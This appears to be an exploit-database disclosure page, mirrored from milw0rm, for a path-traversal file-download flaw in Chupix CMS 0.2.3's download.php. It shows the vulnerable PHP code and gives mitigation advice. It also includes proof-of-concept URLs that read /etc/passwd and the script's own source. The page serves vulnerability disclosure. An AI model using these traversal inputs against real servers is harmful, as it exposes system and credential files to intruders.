header-logo
Suggest Exploit
vendor:
Chupix CMS
by:
7.5
CVSS
HIGH
Remote File Download
22
CWE
Product Name: Chupix CMS
Affected Version From: 2000.2.3
Affected Version To: 2000.2.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability

The Chupix CMS version 0.2.3 is vulnerable to remote file download. The vulnerability exists in the 'download.php' script. An attacker can exploit this vulnerability by manipulating the 'fichier' parameter in the URL to download arbitrary files from the server. This can lead to unauthorized access to sensitive files and information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of Chupix CMS that includes a fix for this issue. Additionally, ensure that input validation and sanitization is implemented to prevent manipulation of the 'fichier' parameter.
Source

Exploit-DB raw data:

# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability
# P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930
################################download.php################################
Lain:18->57 ->
********************************************************************************************************************
if(isset($_GET['fichier'])){ <--------------XXXX                             
                                       *
		// téléchargement du fichier                                               
                         *
		$file = "archives/". $_GET['repertoire'] ."/". 
$_GET['fichier'];<--------------XXXX                *
		$fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] 
.".php"                 *
		$repertoire = "archives/". $_GET['repertoire'] ."/cpt/";                   
                         *
		if(is_file($fichier_txt)){                                                 
                         *
			$fp           =   @fopen($fichier_txt, "r");  <--------------XXXX         
                  *
			$result       =   fread($fp, filesize ($fichier_txt));                    
                  *
			fclose($fp);                                                              
                  *
			$result       =   str_replace("<?php ", "", $result);                     
                  *
			$result       =   str_replace("?>", "", $result);                         
                  *
		                                                                           
                         *
			$num = trim($result);                                                     
                  *
		}else{                                                                     
                         *
			$num = 0;                                                                 
                  *
		}                                                                          
                         *
		$num++;                                                                    
                         *
		                                                                           
                         *
		$msg = "<?php ". $num ." ?>";                                              
                         *
		                                                                           
                         *
		if(!(is_dir($repertoire))){                                                
                         *
			mkdir ($repertoire, 0755);                                                
                  *
		}                                                                          
                         *
		                                                                           
                         *
		$fp  =   @fopen($fichier_txt, "w+");<--------------XXXX                    
                         *
	  	if (flock($fp, LOCK_EX)) { // pose un verrou exclusif                    
                           *
    		fwrite($fp, $msg);                                                     
                             *
   			flock($fp, LOCK_UN); // libère le verrou                               
                     *
		}else{                                                                     
                         *
    		echo "Impossible de verrouiller le fichier <font color=\"maroon\">". 
$fichier ."</font>";          *
		}                                                                          
                         *
   	 	fclose($fp);                                                           
                             *
   	                               	                                         
                                   *                                         
                                                           *
   	 	                                                                       
                             *
		                                                                           
                         *
		header("Content-type: application/force-download");                        
                         *
		header("Content-Disposition: attachment; filename=".$_GET['fichier']);     
                         *
		readfile($file);<--------------XXXX                                        
                         *
}                                                                            
                                       *
********************************************************************************************************************
# POC:
      /download.php?repertoire=defaut&fichier=../../download.php
      /download.php?fichier=../../../../../../../etc/passwd%00
# Discovered by: GoLd_M
# SP.TanX = Tryag.Com & Asb-May.Net & Milw0rm.Com

# milw0rm.com [2007-09-15]

Navigation

Suggest Exploit

Services By CQR